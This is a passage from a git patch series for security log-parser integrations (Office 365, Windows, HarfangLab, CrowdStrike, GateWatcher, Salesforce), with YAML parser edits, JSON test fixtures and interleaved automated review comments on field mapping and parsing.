 "user_type": {
diff --git a/Office 365/o365/tests/exchange_item_update.json b/Office 365/o365/tests/exchange_item_update.json
index ad69be989..30682248f 100644
--- a/Office 365/o365/tests/exchange_item_update.json
+++ b/Office 365/o365/tests/exchange_item_update.json
@@ -29,6 +29,11 @@
 "subject": "HI"
 },
 "office365": {
+ "context": {
+ "client": {
+ "id": "037fd006-a72b-49ae-4bb0-08dba30c8729"
+ }
+ },
 "exchange": {
 "mailbox_guid": "8208550a-4001-439d-a9f6-e95d76767507"
 },
diff --git a/Office 365/o365/tests/inbox_rule.json b/Office 365/o365/tests/inbox_rule.json
index 8af518085..f3609c050 100644
--- a/Office 365/o365/tests/inbox_rule.json
+++ b/Office 365/o365/tests/inbox_rule.json
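Review bot: The `@@ -189`, `@@ -237` and `@@ -254` hunks set `office365.context.client.id` from `ClientAppId` alone, without the `AppId` fallback that the first hunk of this commit adds for the empty-`ClientAppId` case; if the other record types can also carry an empty `ClientAppId`, their `client.id` will be blank where the first stage would have recovered it. Either replicate the fallback `- set:` in each of these stages, or put a comment next to the one fallback explaining why it is specific to that stage, e.g. `# AppId fallback needed here only: <reason this record type leaves ClientAppId empty>`. Each enclosing stage begins before its hunk.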
@@ -21,7 +21,10 @@
 "object_id": "EURPR07A010.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/example.onmicrosoft.com/bc1b1df3-f861-4aec-bf7c-40ce5b5566c1\\RULE_NAME"
 },
 "context": {
- "aad_session_id": "984c0958-0631-4b90-b116-15094fc36847"
+ "aad_session_id": "984c0958-0631-4b90-b116-15094fc36847",
+ "client": {
+ "id": "00000002-0000-0ff1-ce00-000000000000"
+ }
 },
 "exchange_admin": {
 "parameters": [
From 1722cb45207026aa7f8802b095f9ffb60f25f7b7 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 09:18:29 +0200 Subject: [PATCH 207/317] Fix windows
---
 Windows/windows/ingest/parser.yml | 1 + 1 file changed, 1 insertion(+)
diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 5fc6b2eec..e21ec0b94 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -24,6 +24,7 @@ pipeline:
 external:
 name: kv.parse-kv
 properties:
+ raise_errors: false
 input_field: "{{json.event.Message}}"
 output_field: result
 value_sep: ":"
From 5108adaff0f103cfa4a6e28e6c191fc80ae21c4c Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 12:19:44 +0200 Subject: [PATCH 208/317] Fix connector UUID
---
 VadeSecure/vade_secure_m365/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml
index da4658b6a..49acafa59 100644
--- a/VadeSecure/vade_secure_m365/_meta/manifest.yml
+++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml
@@ -1,7 +1,7 @@
 uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232
 name: Vade for M365
 slug: vade-m365
-automation_connector_uuid: aa1f6d1a-8821-467f-9801-a5293ed37616
+automation_connector_uuid: d3860745-4433-4690-b025-378369ad7201
 automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff
 description: >-
 Vade for M365 offers all protections from Vade to our Microsoft 365 Email service
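Review bot: `raise_errors: false` on the `kv.parse-kv` step of the Windows parser presumably suppresses every failure of the key/value parse of `json.event.Message`, so a message that does not parse now yields an empty or partial `result` that later stages read without knowing the parse failed, and the commit title ("Fix windows") does not say which messages were failing. A comment on the new line, `# raise_errors: false — some Message bodies are free text rather than key/value pairs; let the event through with an empty result instead of failing the whole pipeline` (adjusted to the actual cause), keeps the suppression from being copied blindly into other parsers. A fixture with one such message would pin the intended behaviour. The enclosing pipeline step starts before the hunk.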
From 60131a16889905c6cb7b1fd2044d4ad5ab89bfea Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 13:48:57 +0200 Subject: [PATCH 209/317] HarfangLab - fix ip parsing
---
 HarfangLab/harfanglab/ingest/parser.yml | 5 +- .../harfanglab/tests/authentication_2.json | 103 ++++++++++++++++++ 2 files changed, 107 insertions(+), 1 deletion(-) create mode 100644 HarfangLab/harfanglab/tests/authentication_2.json
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 7ff16f6df..1376e0758 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -277,7 +277,6 @@ stages:
 event.type: ["info"]
 event.provider: "{{json_event.message.source_name}}"
 event.code: "{{json_event.message.event_id|string}}"
- source.ip: "{{json_event.message.event_data.IpAddress}}"
 action.id: "{{json_event.message.event_id}}"
 user.name: "{{json_event.message.event_data.SubjectUserName}}"
 user.domain: "{{json_event.message.event_data.SubjectDomainName}}"
@@ -475,6 +474,10 @@ stages:
 action.properties.TaskContentNew_Command: "{{parse_task_info.message.Task.Actions.Exec.Command}}"
 action.properties.TaskContentNew_Args: "{{parse_task_info.message.Task.Actions.Exec.Arguments}}"

+ - set:
+ source.ip: "{{json_event.message.event_data.IpAddress}}"
+ filter: "{{json_event.message.event_data.IpAddress | is_ipaddress}}"
+
 authentication_info:
 actions:
 - set:
diff --git a/HarfangLab/harfanglab/tests/authentication_2.json b/HarfangLab/harfanglab/tests/authentication_2.json
new file mode 100644
index 000000000..0f5d169e9
--- /dev/null
+++ b/HarfangLab/harfanglab/tests/authentication_2.json
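Review bot: The unconditional `source.ip` set removed at line 277 is re-added about two hundred lines later, after the scheduled-task `action.properties.*` actions, under a `filter` that keeps only values `is_ipaddress` accepts (the new fixture shows `IpAddress` as `"-"` for a logon with no network address); it is worth confirming that both hunks belong to the same stage, because if the stage at line 277 is not the one ending at line 474, events it handles silently lose `source.ip`. A short comment above the new `- set:`, `# IpAddress is "-" when the logon carries no network address; only keep real addresses`, explains why the field moved out of the main set. The enclosing stage starts before both hunks.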
@@ -0,0 +1,103 @@ +{ + "input": { + "message": "{\"event_data\": {\"RestrictedAdminMode\": \"-\", \"SubjectUserName\": \"-\", \"SubjectUserSid\": \"S-1-0-0\", \"TargetOutboundUserName\": \"-\", \"ElevatedToken\": \"%%1843\", \"VirtualAccount\": \"%%1843\", \"ProcessId\": \"0x0\", \"AuthenticationPackageName\": \"NTLM\", \"LogonProcessName\": \"NtLmSsp\", \"IpPort\": \"-\", \"WorkstationName\": \"WORKSTATION_NAME\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"IpAddress\": \"-\", \"TargetLinkedLogonId\": \"0x0\", \"SubjectDomainName\": \"-\", \"TargetOutboundDomainName\": \"-\", \"ImpersonationLevel\": \"%%1833\", \"SubjectLogonId\": \"0x0\", \"TargetLogonId\": \"0x6accabcc3\", \"LogonType\": \"3\", \"TargetUserSid\": \"S-1-5-21-11111111111-111111111111-11111111-111\", \"LmPackageName\": \"NTLM V2\", \"TargetUserName\": \"johndoe\", \"TransmittedServices\": \"-\", \"TargetDomainName\": \"EXAMPLE\", \"ProcessName\": \"-\", \"KeyLength\": \"128\"}, \"groups\": [], \"type\": \"wineventlog\", \"computer_name\": \"example.local\", \"destination\": \"syslog\", \"record_number\": 177355019, \"@Version\": \"1\", \"log_name\": \"Security\", \"@event_create_date\": \"2024-11-05T11:10:19.543Z\", \"level\": \"log_always\", \"timestamp\": \"2024-11-05T11:10:20.274688148Z\", \"process_id\": 704, \"user_data\": {}, \"log_type\": \"eventlog\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"user\": {\"domain\": \"\", \"identifier\": \"\", \"name\": \"\", \"type\": \"unknown\"}, \"tenant\": \"11111111111111111111\", \"thread_id\": 9168, \"agent\": {\"dnsdomainname\": \"example.local\", \"osproducttype\": \"Windows Server 2022 Datacenter\", \"domain\": null, \"osversion\": \"10.0.20348\", \"ostype\": \"windows\", \"distroid\": null, \"domainname\": \"EXAMPLE\", \"additional_info\": {}, \"version\": \"4.1.6\", \"hostname\": \"EXAMPLE\", \"agentid\": \"555555555-9999-9999-9999-3e333333cccc\"}, \"event_id\": 4624, \"provider_guid\": 
\"555555555-9999-9999-9999-3e333333cccc\", \"source_name\": \"Microsoft-Windows-Security-Auditing\"}" + }, + "expected": { + "message": "{\"event_data\": {\"RestrictedAdminMode\": \"-\", \"SubjectUserName\": \"-\", \"SubjectUserSid\": \"S-1-0-0\", \"TargetOutboundUserName\": \"-\", \"ElevatedToken\": \"%%1843\", \"VirtualAccount\": \"%%1843\", \"ProcessId\": \"0x0\", \"AuthenticationPackageName\": \"NTLM\", \"LogonProcessName\": \"NtLmSsp\", \"IpPort\": \"-\", \"WorkstationName\": \"WORKSTATION_NAME\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"IpAddress\": \"-\", \"TargetLinkedLogonId\": \"0x0\", \"SubjectDomainName\": \"-\", \"TargetOutboundDomainName\": \"-\", \"ImpersonationLevel\": \"%%1833\", \"SubjectLogonId\": \"0x0\", \"TargetLogonId\": \"0x6accabcc3\", \"LogonType\": \"3\", \"TargetUserSid\": \"S-1-5-21-11111111111-111111111111-11111111-111\", \"LmPackageName\": \"NTLM V2\", \"TargetUserName\": \"johndoe\", \"TransmittedServices\": \"-\", \"TargetDomainName\": \"EXAMPLE\", \"ProcessName\": \"-\", \"KeyLength\": \"128\"}, \"groups\": [], \"type\": \"wineventlog\", \"computer_name\": \"example.local\", \"destination\": \"syslog\", \"record_number\": 177355019, \"@Version\": \"1\", \"log_name\": \"Security\", \"@event_create_date\": \"2024-11-05T11:10:19.543Z\", \"level\": \"log_always\", \"timestamp\": \"2024-11-05T11:10:20.274688148Z\", \"process_id\": 704, \"user_data\": {}, \"log_type\": \"eventlog\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"user\": {\"domain\": \"\", \"identifier\": \"\", \"name\": \"\", \"type\": \"unknown\"}, \"tenant\": \"11111111111111111111\", \"thread_id\": 9168, \"agent\": {\"dnsdomainname\": \"example.local\", \"osproducttype\": \"Windows Server 2022 Datacenter\", \"domain\": null, \"osversion\": \"10.0.20348\", \"ostype\": \"windows\", \"distroid\": null, \"domainname\": \"EXAMPLE\", \"additional_info\": {}, \"version\": \"4.1.6\", \"hostname\": \"EXAMPLE\", \"agentid\": 
\"555555555-9999-9999-9999-3e333333cccc\"}, \"event_id\": 4624, \"provider_guid\": \"555555555-9999-9999-9999-3e333333cccc\", \"source_name\": \"Microsoft-Windows-Security-Auditing\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "dataset": "eventlog", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "info", + "start" + ] + }, + "@timestamp": "2024-11-05T11:10:19.543000Z", + "action": { + "id": 4624, + "outcome": "success", + "properties": { + "AuthenticationPackageName": "NTLM", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "KeyLength": "128", + "LmPackageName": "NTLM V2", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "LogonProcessName": "NtLmSsp", + "LogonType": "3", + "ProcessId": "0x0", + "SubjectLogonId": "0x0", + "SubjectUserSid": "S-1-0-0", + "TargetDomainName": "EXAMPLE", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0x6accabcc3", + "TargetUserName": "johndoe", + "TargetUserSid": "S-1-5-21-11111111111-111111111111-11111111-111", + "VirtualAccount": "%%1843", + "WorkstationName": "WORKSTATION_NAME" + } + }, + "agent": { + "id": "555555555-9999-9999-9999-3e333333cccc", + "name": "harfanglab" + }, + "harfanglab": { + "groups": [] + }, + "host": { + "domain": "EXAMPLE", + "hostname": "EXAMPLE", + "name": "EXAMPLE", + "os": { + "full": "Windows Server 2022 Datacenter", + "version": "10.0.20348" + } + }, + "log": { + "hostname": "EXAMPLE" + }, + "organization": { + "id": "11111111111111111111" + }, + "related": { + "hosts": [ + "EXAMPLE" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "NtLmSsp" + } + }, + "client": { + "name": "WORKSTATION_NAME", + "os": { + "type": "windows" + } + }, + "server": { + "name": "EXAMPLE", + "os": { + "type": "windows" + } + } + }, + "server": { + "domain": "EXAMPLE" + }, + "user": { + "id": "S-1-0-0", + "target": { + "domain": "EXAMPLE", + "id": 
"S-1-5-21-11111111111-111111111111-11111111-111", + "name": "johndoe" + } + } + } +} \ No newline at end of file From eb0b0cc5c8a73329d021db69174c4f92ac35bfaa Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Mon, 11 Nov 2024 11:14:06 +0200 Subject: [PATCH 210/317] CrowdStrike Telemetry - parse ContextBaseFileName --- CrowdStrike/crowdstrike-telemetry/_meta/fields.yml | 5 +++++ CrowdStrike/crowdstrike-telemetry/ingest/parser.yml | 3 +++ .../crowdstrike-telemetry/tests/telemetry_event_26.json | 1 + 3 files changed, 9 insertions(+) diff --git a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml index a59b68006..75e1b7434 100644 --- a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml +++ b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml @@ -1,3 +1,8 @@ +crowdstrike.base_filename: + description: Base Filename + name: crowdstrike.base_filename + type: keyword + crowdstrike.customer_id: description: Customer ID (cid) name: crowdstrike.customer_id diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml index f5da81755..03e9819e7 100644 --- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml +++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml @@ -53,6 +53,9 @@ stages: "host.domain": "{{parsed_event.message.MachineDomain}}" "host.mac": "{{parsed_event.message.MAC}}" + - set: + crowdstrike.base_filename: "{{parsed_event.message.ContextBaseFileName}}" + set_registry_fields: actions: - set: diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json index 82baec896..1e7368eee 100644 --- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json +++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json @@ -18,6 +18,7 @@ "id": "111111111111111" }, "crowdstrike": { + "base_filename": "svchost.exe", "customer_id": "222222222222222222222" }, "file": { 
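Review bot: `description: Base Filename` on the new `crowdstrike.base_filename` field does not say which file name it holds; the parser hunk in the same commit fills it from `ContextBaseFileName`, so the description should name that source for whoever maps or searches the field, e.g. `description: Base file name taken from the event's ContextBaseFileName`. The `fields.yml` file continues outside the hunk.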
From b03ca79d59d45dcd12914df6cd8e3532e5912016 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 12 Nov 2024 10:23:11 +0100 Subject: [PATCH 211/317] Fixing parsed_date to match with detection and not analysis --- GateWatcher/aioniq/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 45330587a..ba98a034e 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -10,7 +10,7 @@ pipeline: external: name: date.parse properties: - input_field: "{{json_load.message.timestamp_analyzed}}" + input_field: "{{json_load.message.timestamp_detected}}" output_field: datetime format: null timezone: UTC From 19383dc28b0a3a0e9a42995cf66cd68f11194583 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 12 Nov 2024 11:43:06 +0100 Subject: [PATCH 212/317] Parsing of TLS metadata using ECS tls.server.* fields and two custom fields --- GateWatcher/aioniq/_meta/fields.yml | 12 ++++++++---- GateWatcher/aioniq/ingest/parser.yml | 14 +++++++++++++- 2 files changed, 21 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index d0d85f7f6..7fb7e28af 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -384,10 +384,14 @@ gatewatcher.tlp: name: gatewatcher.tlp type: text -gatewatcher.tls: - description: This field represents the tls field in a network metadata (used in - legacy format log) - name: gatewatcher.tls +gatewatcher.tls.sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls.sni + type: text + +gatewatcher.tls.fingerprint: + description: This field represents the TLS server fingerprint field in a TLS metadata + name: gatewatcher.tls.fingerprint type: text gatewatcher.ttp: 
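Review bot: The date.parse step now reads `timestamp_detected` with no fallback, so a GateWatcher record that carries only `timestamp_analyzed` (the field used until now) gets an empty `input_field` and no `@timestamp`. The follow-up "Updated tests" commit changes `@timestamp` in seven fixtures, which suggests their inputs carry both fields, but the single-field case is untested; if some modules emit only one of them, `input_field: "{{json_load.message.timestamp_detected or json_load.message.timestamp_analyzed}}"` keeps the previous behaviour as a fallback. The pipeline step continues outside the hunk.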
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index ba98a034e..b71064e6d 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -29,6 +29,8 @@ pipeline: description: DGA - name: retrohunt description: Retrohunt + - name: tls + description: TLS stages: common: actions: @@ -122,7 +124,6 @@ stages: gatewatcher.sip: "{{json_load.message.sip}}" gatewatcher.smb: "{{json_load.message.smb}}" gatewatcher.ssh: "{{json_load.message.ssh}}" - gatewatcher.tls: "{{json_load.message.tls}}" file.hash.sha256: "{{json_load.message.fileinfo.sha256}}" gatewatcher.dhcp: "{{json_load.message.dhcp}}" gatewatcher.dnp3: "{{json_load.message.dnp3}}" @@ -202,3 +203,14 @@ stages: gatewatcher.targeted_countries: "{{json_load.message.targeted_countries}}" gatewatcher.targeted_platforms: "{{json_load.message.targeted_platforms}}" gatewatcher.targeted_organizations: "{{json_load.message.targeted_organizations}}" + tls: + actions: + - set: + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls.sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls.fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" From dabf885f938ac4fb194fce490569c8689ef40983 Mon Sep 17 00:00:00 2001 
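Review bot: The new `tls` stage copies `notbefore`/`notafter` into `tls.server.not_before`/`tls.server.not_after`, which are ECS date fields, and `chain` into `tls.server.certificate_chain`, an ECS array of keywords, without any conversion; the hunk shows no input sample, so if GateWatcher emits these as plain strings the documents will be rejected at indexing time. ECS `tls.version` is also the bare number (`1.2`) with the protocol name in `tls.version_protocol`, so `tls.version: "{{json_load.message.tls.version}}"` should be checked against the raw value. Normalising the dates, e.g. `tls.server.not_before: "{{json_load.message.tls.notbefore | to_rfc3339}}"` and the same for `not_after`, plus one fixture that exercises the stage (neither this commit nor the following one adds any) would settle both points. The `stages` mapping continues outside the hunk.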
From: Clement Lyonnet Date: Tue, 12 Nov 2024 11:52:07 +0100 Subject: [PATCH 213/317] Updated tests --- GateWatcher/aioniq/tests/codebreaker.json | 2 +- GateWatcher/aioniq/tests/dga.json | 2 +- GateWatcher/aioniq/tests/malcore.json | 2 +- GateWatcher/aioniq/tests/retrohunt.json | 2 +- GateWatcher/aioniq/tests/sigflow-alert.json | 2 +- GateWatcher/aioniq/tests/sigflow-file.json | 2 +- GateWatcher/aioniq/tests/sigflow-meta.json | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json index f16f95623..6d7eb789a 100644 --- a/GateWatcher/aioniq/tests/codebreaker.json +++ b/GateWatcher/aioniq/tests/codebreaker.json @@ -17,7 +17,7 @@ "module": "powershell", "severity": 1 }, - "@timestamp": "2023-03-22T10:32:50.269000Z", + "@timestamp": "2023-03-22T10:30:37.145000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json index b9db082ca..9d702ce4d 100644 --- a/GateWatcher/aioniq/tests/dga.json +++ b/GateWatcher/aioniq/tests/dga.json @@ -17,7 +17,7 @@ "module": "dga", "severity": 1 }, - "@timestamp": "2023-03-22T10:46:08.487000Z", + "@timestamp": "2023-03-22T10:25:54.903000Z", "destination": { "address": "pgoadcmgqfacj.com", "domain": "pgoadcmgqfacj.com", diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json index ba95cc211..b5d0a4f69 100644 --- a/GateWatcher/aioniq/tests/malcore.json +++ b/GateWatcher/aioniq/tests/malcore.json @@ -20,7 +20,7 @@ "info" ] }, - "@timestamp": "2023-03-22T10:53:13.408000Z", + "@timestamp": "2023-03-22T10:35:22.615000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json index fd29bcfa4..7c8728304 100644 --- a/GateWatcher/aioniq/tests/retrohunt.json +++ b/GateWatcher/aioniq/tests/retrohunt.json 
@@ -17,7 +17,7 @@ "module": "retrohunt", "severity": 1 }, - "@timestamp": "2023-06-12T10:12:39.001000Z", + "@timestamp": "2023-06-09T14:08:46.845000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json index 1de9534f5..626ee8eb7 100644 --- a/GateWatcher/aioniq/tests/sigflow-alert.json +++ b/GateWatcher/aioniq/tests/sigflow-alert.json @@ -19,7 +19,7 @@ "module": "alert", "severity": 1 }, - "@timestamp": "2023-03-22T10:44:08.001000Z", + "@timestamp": "2023-03-22T10:25:55.690000Z", "destination": { "address": "2.2.2.2", "bytes": 90364, diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json index 2e1580dce..7e9cc8b6a 100644 --- a/GateWatcher/aioniq/tests/sigflow-file.json +++ b/GateWatcher/aioniq/tests/sigflow-file.json @@ -16,7 +16,7 @@ ], "module": "fileinfo" }, - "@timestamp": "2023-03-22T10:44:07.998000Z", + "@timestamp": "2023-03-22T10:25:55.469000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json index 4da5dbc30..6e8cba037 100644 --- a/GateWatcher/aioniq/tests/sigflow-meta.json +++ b/GateWatcher/aioniq/tests/sigflow-meta.json @@ -16,7 +16,7 @@ ], "module": "http" }, - "@timestamp": "2023-03-22T10:44:07.997000Z", + "@timestamp": "2023-03-22T10:25:55.377000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", From 9336df505b67a0453815a0e29b09800fa904a387 Mon Sep 17 00:00:00 2001 
From: "vladyslav.guriev" Date: Tue, 12 Nov 2024 13:19:50 +0200 Subject: [PATCH 214/317] Fix: Salesforce login event --- .../salesforce-events/ingest/parser.yml | 9 +++ .../tests/salesforce_complete_event.json | 6 +- .../tests/salesforce_complete_event_1.json | 6 +- .../tests/salesforce_login_event.json | 9 +++ .../tests/salesforce_login_event_1.json | 69 +++++++++++++++++++ .../tests/session_integrity.json | 14 ++-- 6 files changed, 107 insertions(+), 6 deletions(-) create mode 100644 Salesforce/salesforce-events/tests/salesforce_login_event_1.json diff --git a/Salesforce/salesforce-events/ingest/parser.yml b/Salesforce/salesforce-events/ingest/parser.yml index 01b66855f..54db25d6c 100644 --- a/Salesforce/salesforce-events/ingest/parser.yml +++ b/Salesforce/salesforce-events/ingest/parser.yml @@ -147,6 +147,14 @@ stages: user.name: "{{json_event.output.USERNAME}}" filter: "{{json_event.output.USERNAME != None}}" + - set: + user.name: "{{json_event.output.USER_NAME}}" + filter: "{{json_event.output.USER_NAME != None and '@' not in json_event.output.USER_NAME}}" + + - set: + user.email: "{{json_event.output.USER_NAME}}" + filter: "{{json_event.output.USER_NAME != None and '@' in json_event.output.USER_NAME}}" + - set: user.email: "{{json_event.output.USER}}" filter: "{{json_event.output.USER != None}}" @@ -201,6 +209,7 @@ stages: tls.cipher: "{{json_event.output.CIPHER_SUITE}}" tls.version: "{{json_event.output.TLS_PROTOCOL}}" + url.original: "{{json_event.output.LOGIN_URL}}" host.id: "{{json_event.output.DEVICE_ID}}" host.os.name: "{{json_event.output.OS_NAME}}" host.os.version: "{{json_event.output.OS_VERSION}}" diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event.json b/Salesforce/salesforce-events/tests/salesforce_complete_event.json index 03b6811ee..ceeb7b881 100644 --- a/Salesforce/salesforce-events/tests/salesforce_complete_event.json +++ b/Salesforce/salesforce-events/tests/salesforce_complete_event.json 
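Review bot: The `user.name` set at line 150 is filtered on `'@' not in USER_NAME`, so the name is dropped whenever `USER_NAME` is email-shaped, and the new `salesforce_login_event_1.json` fixture shows exactly that outcome (`user.email` set, no `user.name`, no `related.user`); Salesforce usernames are required to be in email form, so this is the common case, and `user.name` should be set whenever the field is present, `filter: "{{json_event.output.USER_NAME != None}}"`, keeping the `'@' in` test only for `user.email`. Note also that the existing `user.email: "{{json_event.output.USER}}"` set follows immediately, so when both `USER` and `USER_NAME` are present the later set presumably wins — confirm the engine's override order. The enclosing stage starts outside the hunk.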
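Review bot: `url.original: "{{json_event.output.LOGIN_URL}}"` receives a bare host in the new fixture (`test.my.salesforce.com`), whose expected output has `url.original` but no `url.domain`, while the updated `salesforce_login_event.json` fixture (`https://login.salesforce.com`) gets `url.domain`, `url.scheme` and `url.port` derived; the field is therefore only useful for correlation when Salesforce happens to include a scheme. Since `LOGIN_URL` is a host rather than a full URL at least some of the time, a second set such as `url.domain: "{{json_event.output.LOGIN_URL}}"` with `filter: "{{json_event.output.LOGIN_URL != None and '://' not in json_event.output.LOGIN_URL}}"` would give a stable domain field in both cases. The enclosing stage starts outside the hunk.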
@@ -45,6 +45,9 @@ "related": { "ip": [ "1.2.3.4" + ], + "user": [ + "test_user" ] }, "salesforce": { @@ -119,7 +122,8 @@ "query": "queryParam1=val1&queryParam2=val2" }, "user": { - "id": "00530000009M943" + "id": "00530000009M943", + "name": "test_user" }, "user_agent": { "device": { diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json index 051638d22..89c90352a 100644 --- a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json +++ b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json @@ -45,6 +45,9 @@ "related": { "ip": [ "1.2.3.4" + ], + "user": [ + "test_user" ] }, "salesforce": { @@ -115,7 +118,8 @@ "path": "/sObject/0064100000JXITSAA5/view" }, "user": { - "id": "00530000009M943" + "id": "00530000009M943", + "name": "test_user" }, "user_agent": { "name": "Chrome", diff --git a/Salesforce/salesforce-events/tests/salesforce_login_event.json b/Salesforce/salesforce-events/tests/salesforce_login_event.json index e87c6f5a9..7719dc746 100644 --- a/Salesforce/salesforce-events/tests/salesforce_login_event.json +++ b/Salesforce/salesforce-events/tests/salesforce_login_event.json @@ -28,6 +28,15 @@ "address": "192.168.0.1", "ip": "192.168.0.1" }, + "url": { + "domain": "login.salesforce.com", + "original": "https://login.salesforce.com", + "port": 443, + "registered_domain": "salesforce.com", + "scheme": "https", + "subdomain": "login", + "top_level_domain": "com" + }, "user": { "email": "john.doe@example.com" } diff --git a/Salesforce/salesforce-events/tests/salesforce_login_event_1.json b/Salesforce/salesforce-events/tests/salesforce_login_event_1.json new file mode 100644 index 000000000..ed22aefee --- /dev/null +++ b/Salesforce/salesforce-events/tests/salesforce_login_event_1.json 
@@ -0,0 +1,69 @@ +{ + "input": { + "message": "{\"EVENT_TYPE\":\"Login\",\"TIMESTAMP\":\"20241026044641.024\",\"REQUEST_ID\":\"request_id_test\",\"ORGANIZATION_ID\":\"ORG_ID_TEST\",\"USER_ID\":\"USER_ID_TEST\",\"RUN_TIME\":\"47\",\"CPU_TIME\":\"12\",\"URI\":\"/services/oauth2/token\",\"SESSION_KEY\":\"\",\"LOGIN_KEY\":\"xxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"\",\"DB_TOTAL_TIME\":\"29963703\",\"LOGIN_TYPE\":\"i\",\"BROWSER_TYPE\":\"python-requests/2.28.0\",\"API_TYPE\":\"\",\"API_VERSION\":\"9998.0\",\"USER_NAME\":\"user.integration@test.com\",\"TLS_PROTOCOL\":\"TLSv1.3\",\"CIPHER_SUITE\":\"TLS_AES_256_GCM_SHA384\",\"LOGIN_URL\":\"test.my.salesforce.com\",\"AUTHENTICATION_METHOD_REFERENCE\":\"\",\"LOGIN_SUB_TYPE\":\"oauthclientcredentials\",\"AUTHENTICATION_SERVICE_ID\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-26T04:46:41.024Z\",\"USER_ID_DERIVED\":\"USER_ID_TEST_IA4\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\",\"LOGIN_STATUS\":\"LOGIN_NO_ERROR\",\"SOURCE_IP\":\"1.2.3.4\",\"FORWARDED_FOR_IP\":\"\"}" + }, + "expected": { + "message": 
